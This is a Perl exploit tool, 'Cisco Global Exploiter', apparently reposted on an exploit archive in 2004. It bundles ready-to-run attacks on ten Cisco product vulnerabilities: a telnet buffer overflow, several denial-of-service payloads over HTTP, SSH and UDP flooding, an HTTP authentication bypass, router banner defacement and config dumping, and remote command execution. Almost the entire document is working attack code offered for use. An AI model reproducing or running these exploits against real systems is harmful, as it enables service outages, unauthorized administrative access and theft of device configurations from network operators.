exploits , vulnerabilities , articles , Multiple Cisco Products Vulnerabilities Exploit (Cisco Global Exploiter)

#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities 
# for an incorrect or illegal use of this software 
# or for eventual damages to others systems.
#
# www blackangels it
##



############
# Modules ##
############

use Socket;
use IO::Socket;


#########
# Main ##
#########

$host = "";
$expvuln = "";
$host = @ARGV[ 1 ];
$expvuln = @ARGV[ 3 ];

if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
} 
elsif ($expvuln eq "2") {
cisco2();
} 
elsif ($expvuln eq "3") {
cisco3();
} 
elsif ($expvuln eq "4") {
cisco4();
} 
elsif ($expvuln eq "5") {
cisco5();
} 
elsif ($expvuln eq "6") {
cisco6();
} 
elsif ($expvuln eq "7") {
cisco7();
} 
elsif ($expvuln eq "8") {
cisco8();
} 
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}


##############
# Functions ##
##############

sub usage
{
 printf "\nUsage :\n";
 printf "perl cge.pl -h <host> -v <vulnerability
number>\n\n";
 printf "Vulnerabilities list :\n";
 printf "[1] - Cisco 677/678 Telnet Buffer Overflow
Vulnerability\n";
 printf "[2] - Cisco IOS Router Denial of Service
Vulnerability\n";
 printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
 printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative
Access Vulnerability\n";
 printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service
Vulnerability\n";
 printf "[6] - Cisco 675 Web Administration Denial of Service
Vulnerability\n";
 printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command
Vulnerability\n";
 printf "[8] - Cisco IOS Software HTTP Request Denial of Service
Vulnerability\n";
 printf "[9] - Cisco 514 UDP Flood Denial of Service
Vulnerability\n";
 printf "[10] - CiscoSecure ACS for Windows NT Server Denial of
Service Vulnerability\n\n";
 exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
 my $serv = $host;
 my $dch = "?????????????????a~ %%%%%XX%%%%%"; 
 my $num = 30000;
 my $string .= $dch x $num; 
 my $shc="\015\012";

 my $sockd = IO::Socket::INET->new (
 Proto => "tcp",
 PeerAddr => $serv,
 PeerPort => "(23)",
 ) || die("No telnet server detected on $serv ...\n\n");

 $sockd->autoflush(1);
 print $sockd "$string". $shc;
 while (<$sockd>){ print }
 print("\nPacket sent ...\n");
 sleep(1);
 print("Now checking server's status ...\n");
 sleep(2);

 my $sockd2 = IO::Socket::INET->new (
 Proto => "tcp",
 PeerAddr => $serv,
 PeerPort => "(23)",
 ) || die("Vulnerability successful exploited. Target server is 
 down ...\n\n");

 print("Vulnerability unsuccessful exploited. Target server is still
up ...\n\n"); 
 exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
 my $serv = $host;

 my $sockd = IO::Socket::INET->new (
 Proto=>"tcp",
 PeerAddr=>$serv,
 PeerPort=>"http(80)",);
 unless ($sockd){die "No http server detected on $serv
...\n\n"};
 $sockd->autoflush(1);
 print $sockd "GET /\%\% HTTP/1.0\n\n";
 -close $sockd;
 print "Packet sent ...\n";
 sleep(1);
 print("Now checking server's status ...\n");
 sleep(2);

 my $sockd2 = IO::Socket::INET->new (
 Proto=>"tcp",
 PeerAddr=>$serv,
 PeerPort=>"http(80)",);
 unless ($sockd2){die "Vulnerability successful exploited. Target 
 server is down ...\n\n"};

 print("Vulnerability unsuccessful exploited. Target server is still
up ...\n\n"); 
 exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
 my $serv= $host;
 my $n=16;
 my $port=80;
 my $target = inet_aton($serv);
 my $fg = 0;

 LAB: while ($n<100) { 
 my @results=exploit("GET /level/".$n."/exec/-
HTTP/1.0\r\n\r\n");
 $n++;
 foreach $line (@results){
 $line=~ tr/A-Z/a-z/;
 if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
 if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
 } 

 if ($fg==1) {
 sleep(2);
 print "Vulnerability unsuccessful exploited ...\n\n\r";
 }
 else {
 sleep(2);
 print "Vulnerability successful exploited with
[http://$serv/level/$n/exec/....] ...\n\n\r"; 
 last LAB; 
 }

 sub exploit {
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
 die("Unable to initialize socket ...\n\n");
 if(connect(S,pack "SnA4x8",2,$port,$target)){
 my @in;
 select(S); 
 $|=1; 
 print $pstr;
 while(<S>){ push @in, $_;}
 select(STDOUT); close(S); return @in;
 } 
 else { die("No http server detected on $serv ...\n\n"); }
 }
 } 
 exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access
Vulnerability
{
 my $serv = $host;
 my $n = 16;

 while ($n <100) { 
 exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
 $wr =~ s/\n//g;
 if ($wr =~ /200 ok/) { 
 while(1)
 { print "\nVulnerability could be successful exploited. Please 
 choose a type of attack :\n";
 print "[1] Banner change\n";
 print "[2] List vty 0 4 acl info\n";
 print "[3] Other\n";
 print "Enter a valid option [ 1 - 2 - 3 ] : ";
 $vuln = <STDIN>; 
 chomp($vuln);

 if ($vuln == 1) { 
 print "\nEnter deface line : ";
 $vuln = <STDIN>; 
 chomp($vuln);
 exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln 
 HTTP/1.0\n\n");
 }
 elsif ($vuln == 2) { 
 exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n"); 
 print "$wrf";
 } 
 elsif ($vuln == 3) 
 { print "\nEnter attack URL : ";
 $vuln = <STDIN>; 
 chomp($vuln);
 exploit1("GET /$vuln HTTP/1.0\n\n");
 print "$wrf";
 }
 }
 }
 $wr = ""; 
 $n++;
 }
 die "Vulnerability unsuccessful exploited ...\n\n";

 sub exploit1 { 
 my $sockd = IO::Socket::INET -> new (
 Proto => 'tcp',
 PeerAddr => $serv,
 PeerPort => 80,
 Type => SOCK_STREAM,
 Timeout => 5);
 unless($sockd){die "No http server detected on $serv ...\n\n"}
 $sockd->autoflush(1);
 $sockd -> send($_[0]);
 while(<$sockd>){$wr .= $_} $wrf = $wr;
 close $sockd;
 } 
 exit(1); 
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service
Vulnerability
{
 my $serv = $host; 
 my $port = 22; 
 my $vuln = "a%a%a%a%a%a%a%";
 
 my $sockd = IO::Socket::INET->new (
 PeerAddr => $serv,
 PeerPort => $port,
 Proto => "tcp")
 || die "No ssh server detected on $serv ...\n\n";

 print "Packet sent ...\n";
 print $sockd "$vuln";
 close($sockd);
 exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
 my $serv = $host; 
 my $port = 80; 
 my $vuln = "GET ? HTTP/1.0\n\n";
 
 my $sockd = IO::Socket::INET->new (
 PeerAddr => $serv,
 PeerPort => $port,
 Proto => "tcp")
 || die "No http server detected on $serv ...\n\n";

 print "Packet sent ...\n";
 print $sockd "$vuln";
 sleep(2);
 print "\nServer response :\n\n";
 close($sockd); 
 exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command
Vulnerability
{
 my $serv = $host; 
 my $port = 80; 
 my $k = "";
 
 print "Enter a file to read [ /show/config/cr set as default ] :
";
 $k = <STDIN>;
 chomp ($k);
 if ($k eq "")
 {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
 else
 {$vuln = "GET /exec$k HTTP/1.0\n\n";}

 my $sockd = IO::Socket::INET->new (
 PeerAddr => $serv,
 PeerPort => $port,
 Proto => "tcp")
 || die "No http server detected on $serv ...\n\n";

 print "Packet sent ...\n";
 print $sockd "$vuln";
 sleep(2);
 print "\nServer response :\n\n";
 while (<$sockd>){print}
 close($sockd); 
 exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service
Vulnerability 
{
 my $serv = $host; 
 my $port = 80; 
 my $vuln = "GET /error?/ HTTP/1.0\n\n";

 my $sockd = IO::Socket::INET->new (
 PeerAddr => $serv,
 PeerPort => $port,
 Proto => "tcp")
 || die "No http server detected on $serv ...\n\n";

 print "Packet sent ...\n";
 print $sockd "$vuln";
 sleep(2);
 print "\nServer response :\n\n";
 while (<$sockd>){print}
 close($sockd); 
 exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
 my $ip = $host;
 my $port = "514";
 my $ports = ""; 
 my $size = "";
 my $i = "";

 print "Input packets size : ";
 $size = <STDIN>; 
 chomp($size);

 socket(SS, PF_INET, SOCK_DGRAM, 17);
 my $iaddr = inet_aton("$ip");

 for ($i=0; $i<10000; $i++) 
 {send(SS, 0, $size, sockaddr_in($port, $iaddr));}

 printf "\nPackets sent ...\n";
 sleep(2);
 printf "Please enter a server's open port : ";
 $ports = <STDIN>;
 chomp $ports;
 printf "\nNow checking server status ...\n";
 sleep(2);

 socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An
error occuring while 
 loading socket ...\n\n";
 my $dest = sockaddr_in ($ports, inet_aton($ip));
 connect (SO, $dest) || die "Vulnerability successful exploited.
Target server is down ...\n\n";

 printf "Vulnerability unsuccessful exploited. Target server is still
up ...\n\n";
 exit(1);
}

sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service
Vulnerability
{
 my $ip = $host;
 my $vln = "%%%%%XX%%%%%"; 
 my $num = 30000;
 my $string .= $vln x $num; 
 my $shc="\015\012";

 my $sockd = IO::Socket::INET->new (
 Proto => "tcp",
 PeerAddr => $ip,
 PeerPort => "(2002)",
 ) || die "Unable to connect to $ip:2002 ...\n\n";

 $sockd->autoflush(1);
 print $sockd "$string" . $shc;
 while (<$sockd>){ print }
 print "Packet sent ...\n";
 close($sockd);
 sleep(1);
 print("Now checking server's status ...\n");
 sleep(2);

 my $sockd2 = IO::Socket::INET->new (
 Proto=>"tcp",
 PeerAddr=>$ip,
 PeerPort=>"(2002)",);
 unless ($sockd){die "Vulnerability successful exploited. Target
server is 
 down ...\n\n"};

 print("Vulnerability unsuccessful exploited. Target server is still
up ...\n\n"); 
 exit(1);
}
securitydot.net - 2004-03-28